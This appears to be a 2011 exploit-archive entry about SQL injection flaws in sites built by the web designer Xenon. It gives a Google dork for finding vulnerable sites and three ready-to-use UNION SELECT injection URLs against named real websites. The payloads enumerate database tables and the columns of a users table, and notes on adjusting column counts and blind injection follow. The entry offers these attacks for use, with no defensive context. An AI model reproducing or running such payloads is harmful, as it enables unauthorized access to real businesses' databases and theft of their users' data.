Sites designed by Xenon suffer from multiple remote SQL injection vulnerabilities.
c098a4388a127889dfd3764db922cde8244b6a82e61ff357ae5785d470fd40d5
# Exploit Title: Xenon SQL Injection Vulnerability
# Google Dork: intext:"Designed by Xenon" inurl:php?id=
# Date: 14.10.2011
# Author: m3rciL3Ss
# Service Link: http://xe.co.za/portfolio.shtml
# Version:
# Category: webapps
################################
# Demo site:
===[ SQL ]===
[»] http://www.hairhealthbeauty.co.za/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables
[»] http://northcoastkawasaki.co.za/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273
[»] http://www.sqdc.co.za/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
============================
Note: View Page Source ~ hairhealthbeauty
Note 2: Number of Column May Vary
Note 3 : There are some websites, blind sql ~ northcoastkawasaki
===========================
################################
m3rciL3Ss.blogspot.com
twitter.com/_m3rciL3Ss
################################
Good Luck ~ bad english :)
################################